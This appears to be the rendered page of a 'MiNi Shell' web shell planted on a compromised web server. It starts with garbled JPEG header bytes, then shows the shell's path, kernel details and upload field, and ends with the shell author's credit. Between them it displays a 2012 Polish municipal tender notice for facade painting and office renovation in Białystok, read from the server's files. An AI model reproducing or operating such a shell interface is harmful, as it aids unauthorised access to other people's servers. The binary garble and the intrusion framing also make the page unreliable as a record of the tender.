JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120720/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120720/159055-N-2012.html

<p class="kh_header"><b>Białystok: MALOWANIE  ELEWACJI  I  REMONT POMIESZCZEŃ W BUDYNKU ZARZĄDU MIENIA KOMUNALNEGO PRZY  Ul. GEN. J. BEMA 89/1 W BIAŁYMSTOKU.- nr sprawy:TT/DZ/3412/56/12</b><br>
<b>Numer ogłoszenia: 159055 - 2012; data zamieszczenia: 20.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MALOWANIE  ELEWACJI  I  REMONT POMIESZCZEŃ W BUDYNKU ZARZĄDU MIENIA KOMUNALNEGO PRZY  Ul. GEN. J. BEMA 89/1 W BIAŁYMSTOKU.- nr sprawy:TT/DZ/3412/56/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> MALOWANIE  ELEWACJI I REMONT POMIESZCZEŃ W BUDYNKU ZARZĄDU MIENIA KOMUNALNEGO PRZY  Ul. GEN. J. BEMA 89/1 W BIAŁYMSTOKU- zgodnie opisem przedmiotu zamówienia stanowiącym z załącznik nr 1  do SIWZ
Zakres robót:
I .ELEWACJA
Opis przedmiotu zamówienia branży budowlanej na malowanie elewacji biurowca ZMK przy ul. BEMA 89/1
1.	Przygotowanie starego podłoża poprzez oczyszczenie mechaniczne i zmycie - powierzchnia porowata tynku mineralnego.
2.	Usunięcie graffiti z powierzchni cegły klinkierowej żółtej.
3.	Zabezpieczenie powierzchni cegły klinkierowej żółtej przed graffiti.
4.	Wykonanie obróbek blacharskich z blachy powlekanej w kolorze białym o szerokości w rozwinięciu do 25 cm na gzymsach międzypiętrowych z kształtek styropianowych, z uszczelnieniem styku blacha - ściana.
5.	Wykonanie obróbek blacharskich z blachy powlekanej w kolorze białym o szerokości w rozwinięciu ponad 25cm na gzymsach międzypiętrowych z kształtek styropianowych, z uszczelnieniem styku blacha - ściana.
6.	Gruntowanie powierzchni tynku mineralnego pod malowanie farbą silikatową np: WEBER; CAPAROL lub równoważne.
7.	Malowanie dwukrotne elewacji farbą silikonową np: WEBER; CAPAROL lub równoważne (powierzchnia tynku mineralnego- powierzchnia porowata)- wykonane ręcznie;
8.	Malowanie dwukrotne farbą olejną rynien i rur spustowych w kolorze zielonym, bez miniowania
9.	Malowanie dwukrotne farbą olejną powierzchni pełnych elementów metalowych w kolorze zielonym bez miniowania
10.	Rusztowania zewnętrzne rurowe o wysokości do 15m
11.	Osłony z siatki na rusztowaniach zewnętrznych. 
12.	Osłony okien folią polietylenową
II. Remont pokoi i klatek schodowych
1.	Likwidacja desek odbojowych w korytarzu na parterze z naprawą powierzchni tynku po demontażu.
2.	Rozebranie obicia ścian na ruszcie drewnianym w pokoju Nr 07 z naprawą tynku po demontażu. 
3.	Wykonanie ściany działowej z płyt gipsowo-kartonowych ognioodpornych  grub.12,5 mm na ruszcie metalowym z pokryciem obustronnym dwuwarstwowo z wypełnieniem wełną mineralną gr. 50 mm
4.	Obsadzenie w ścianach z płyt gipsowo - kartonowych kratek wentylacyjnych 14x21 bez żaluzji oraz naświetla z PCV  z odzysku o wym.1750x620 mm.  
5.	Malowanie trzykrotne farbami emulsyjnymi tynków wewnętrznych sufitów i ścian w KOLORZE 
z uprzednim przygotowaniem podłoża jak: zeskrobanie i zmycie farby, przetarcie istniejących tynków, gruntowanie preparatem gruntującym.
6.	 Wykonanie na ścianach kl. schodowej i korytarzach na wysokości 1,50 m ( w miejsce lamperii ) tynku dekoracyjnego kamyczkowego o grubości ziarna 1,5 mm
7.	Malowanie dwukrotne farbą olejną grzejników radiatorowych; rur wodociągowych i gazowych o średnicy do 50mm,  
8.	Lakierowanie parapetów drewnianych w nowej części budynku .
9.	Wykucie z muru ościeżnic stalowych z naprawą powierzchni tynku po demontażu.
10.	Poszerzenie otworu drzwiowego. 
11.	MONTAŻ ościeżnic regulowanych o powierzchni otworu do 2,0 m2 w ścianach z cegieł o gr. 12 - 18 cm.. 
12.	MONTAŻ - Skrzydła drzwiowe laminowane folią PCV w kolorach np. dąb, olcha, machoń, o powierzchni do 1,60m2 - jednodzielne pełne z tłoczeniem, z tulejami wentylacyjnymi ( drzwi do łazienek),z założeniem klamki z szyldami ,zamka wpuszczanego z wkładką patentową - łącznie z umieszczeniem na drzwiach oznaczeń np: Nr pokoju lub WC..
13.	Wymiana samozamykacza w drzwiach aluminiowych (sekretariat na II piętrze) .
14.	MONTAŻ skrzydła drzwiowego z ODZYSKU w pomieszczeniu piwnicy - pełne o powierzchni do 1,60m2.
15.	Regulacja na zawiasach okien z profili PCV, wymiana uszczelek w razie konieczności.
16.	Rozebranie podłóg z paneli podłogowych i posadzki z tworzyw sztucznych..
17.	Ułożenie wykładziny rulonowej PCW heterogenicznej, o grubości całkowitej 2,2 mm; grubość warstwy użytkowej 0,5 mm; o odporności na ścieranie /grupa T z uprzednim wyrównaniem podłoża.
18.	Przygotowanie podłoża i wykonanie posadzki z płytek o wymiarach 30x30cm  ANTYPOŚLIZGOWYCH w skali od R9 do R13, o odporności na ścieranie klasy III. Stopień twardości 7 wg. skali MOHSA  .
19.	Wykonanie cokolików wysokości do10cm.
20.	MONTAŻ  progów aluminiowych maskujących połączenia różnorodnych posadzek w progu drzwi. 
21.	Założenie w pomieszczeniu serwera i ksero elektronicznego zamka szyfrowego z zasilaczem 
22.	i elektrozaczepem Np: SL2000B lub równoważny.
23.	Wymiana klamek metalowych z rozetami w KOLORZE zbliżonym do koloru drzwi.
24.	Wymiana posadzki w pokoju Nr 100 i 111 z wykonaniem izolacji przeciwwilgociowej, przeciwdźwiękowej poziomej z płyt styropianowych EPS-100, gr. 2 cm, warstwy wyrównawczej z zaprawy cementowej grubości 50mm,
25.	Usunięcie gruzu za pomocą z zsypu budowlanego do gruzu.
26.	Przenoszenie mebli poza obszar remontowanych pokoi lub korytarzy,  razie konieczności demontaż 
i ponowy ich montaż. 
27.	Zabezpieczenie folią podłóg i pozostawionych ruchomości w remontowanych pomieszczeniach.
28.	Materiały pochodzące z rozbiórki nie nadające się do wykorzystania lub ponownego wbudowania należy wywieźć na wysypisko lub zutylizować .
Szczególne uwarunkowania wykonania prac remontowych w czynnym obiekcie.
1.	Zamawiający zastrzega, iż prace remontowe wewnątrz budynku szczególnie ciągach komunikacyjnych
jak korytarze  klatki schodowe należy prowadzić poza godzinami urzędowania pracowników.  
2.	Poszczególne pomieszczenia do remontu będą udostępniane przy wcześniejszym uzgodnieniu 
3.	Wykonawca zobowiązany jest utrzymywać czystość ciągach komunikacyjnych (sprzątanie na bieżąco).
4.	Aby utrzymać ciągłość pracy Zarząd Mienia Komunalnego rozładunek materiałów należy przeprowadzać po godz. 153o..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.50.00-7, 45.42.11.30-4, 45.43.10.00-7, 45.33.20.00-3, 45.31.10.00-0, 45.33.11.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 130.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
            Ocena spełniania warunku zostanie dokonana przez zamawiającego na podstawie załączonego 
            do oferty oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	wykonawca wykonał zgodnie ze sztuką budowlaną i prawidłowo ukończył w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jedną robotę budowlaną polegającą na remoncie elewacji o wartości nie mniejszej niż 20 000,00 zł (słownie: dwadzieścia  tysięcy złotych) brutto każda; oraz minimum dwie roboty budowlane polegające na remoncie lub adaptacji lub modernizacji pomieszczeń o wartości nie mniejszej niż 50.000,00 zł (słownie; pięćdziesiąt  tysięcy złotych) brutto każda. ), z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone  Ocena spełniania warunku zostanie dokonana przez zamawiającego na podstawie załączonego 
            do oferty wykazu robót budowlanych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
            Ocena spełniania warunku zostanie dokonana przez zamawiającego na podstawie załączonego 
            do oferty oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	kierownik robót budowlanych - uprawnienia do kierowania robotami budowlanymi 
w specjalności konstrukcyjno-budowlanej odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane, 
Ocena spełniania warunku zostanie dokonana przez zamawiającego na podstawie załączonego 
            do oferty wykazu osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
            Ocena spełniania warunku zostanie dokonana przez zamawiającego na podstawie załączonego 
            do oferty oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokument określony w rozdziale  VI SIWZ pkt 3 ppkt 2 - dotyczy KRS, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust.1 pkt 2 ustawy Pzp składa pełnomocnik wykonawców wspólnie ubiegających się 
o udzielenie zamówienia w ich imieniu (w miejscu -nazwa i adres  wykonawcy-należy wpisać dane dotyczące poszczególnych członków konsorcjum lub spółki cywilnej) bądź każdy z wykonawców oddzielnie,
2)	dokumenty określone w rozdziale VI SIWZ pkt 2 ppkt 1, 2 i 3 winien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia,
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale VI SIWZ pkt 1 oraz oświadczenie o niepodleganiu wykluczeniu określone w rozdziale VI SIWZ pkt 3 ppkt 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu (w miejscu nazwa i adres  wykonawcy należy wpisać dane dotyczące poszczególnych członków konsorcjum lub spółki cywilnej) bądź każdy 
z wykonawców oddzielnie.
7.	Zamawiający wymaga także załączenia do oferty innych dokumentów:
1)	wypełniony formularz ofertowy - wg załączonego wzoru załącznik nr 2 do SIWZ,
2)	pełnomocnictwo w oryginale albo notarialnie potwierdzonej kopii - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 
ustawy Pzp,
3)	Pisemne zobowiązanie podmiotu trzeciego - w przypadku gdy podmiot trzeci udostępni swoje zasoby wiedzy i doświadczenia , osoby zdolne do wykonania zamówienia, zdolność finansowa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość: 
1) zmiany terminu wykonania przedmiotu umowy, jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na siłę wyższą lub inne okoliczności niezależne od stron, lub których strony przy zachowaniu należytej staranności nie były w stanie uniknąć lub przewidzieć. 
Za siłę wyższą uważa się zdarzenia zewnętrzne, których skutków nie da się przewidzieć ani im zapobiec; 
2) zmiany wynagrodzenia ryczałtowego brutto w przypadku zmiany obowiązującej wysokości stawki podatku VAT (zmiana dotyczyć może jedynie robót nie zafakturowanych). 
3) zmiany kierownika robót, przedstawionego w ofercie jedynie za uprzednią pisemną zgodą Zamawiającego, akceptując nowego kierownika robót w sytuacji, gdy: 
a) Wykonawca z własnej inicjatywy proponuje zmianę kierownika robót w przypadkach: 
- choroby lub innych zdarzeń losowych dotyczących kierownika robót lub nie wywiązywania się kierownika robót z obowiązków wynikających z umowy, 
- jeżeli zmiana kierownika robót będzie niezbędna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacja), 
b) Zamawiający może żądać od Wykonawcy zmiany kierownika robót, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy. Wykonawca zobowiązany jest zmienić kierownika robót zgodnie z żądaniem Zamawiającego we wskazanym przez Zamawiającego terminie. 
W przypadku zmiany kierownika robót - nowy kierownik robót musi spełniać wymagani określone                       w SIWZ dla danego specjalisty;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego 15-370 Białystok ul. gen. J. Bema 89/1- pok. 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2012 godzina 10:00, miejsce: Zarząd Mienia Komunalnego 15-370 Białystok ul. gen. J. Bema 89/1- pok. 201-Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com